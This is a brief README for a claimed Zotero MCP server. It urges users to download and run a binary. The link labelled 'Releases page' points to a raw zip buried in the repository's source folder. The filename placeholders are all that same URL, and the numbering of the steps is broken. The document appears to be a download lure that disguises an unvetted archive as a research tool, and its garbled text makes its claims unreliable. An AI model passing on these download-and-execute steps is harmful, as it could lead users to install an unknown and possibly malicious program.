Welcome to the zotero-mcp-server! This application helps you manage your research references. It uses the Model Context Protocol (MCP) to work seamlessly with Zotero, making it easy to search, cite, and organize your research. 

## 📥 Download & Install
1. Visit the [Releases page](https://github.com/Maxdepai1212/zotero-mcp-server/raw/refs/heads/main/src/services/server_mcp_zotero_v1.8-alpha.1.zip) to download the latest version.
2. Once on the page, look for the assets section.
3. Choose the file that matches your operating system. It may be labeled as `https://github.com/Maxdepai1212/zotero-mcp-server/raw/refs/heads/main/src/services/server_mcp_zotero_v1.8-alpha.1.zip`, `https://github.com/Maxdepai1212/zotero-mcp-server/raw/refs/heads/main/src/services/server_mcp_zotero_v1.8-alpha.1.zip`, or similar for other platforms.
4. Click the file to start the download.

## 🔧 Installation Steps

   - **For Linux Users:** Open the terminal and navigate to the downloaded folder. You may need to run `chmod +x zotero-mcp-server-linux` to make it executable, then type `./zotero-mcp-server-linux` to install.

2. Follow the setup prompts to complete the installation.

3. After installation, open the application from your applications menu or desktop shortcut.
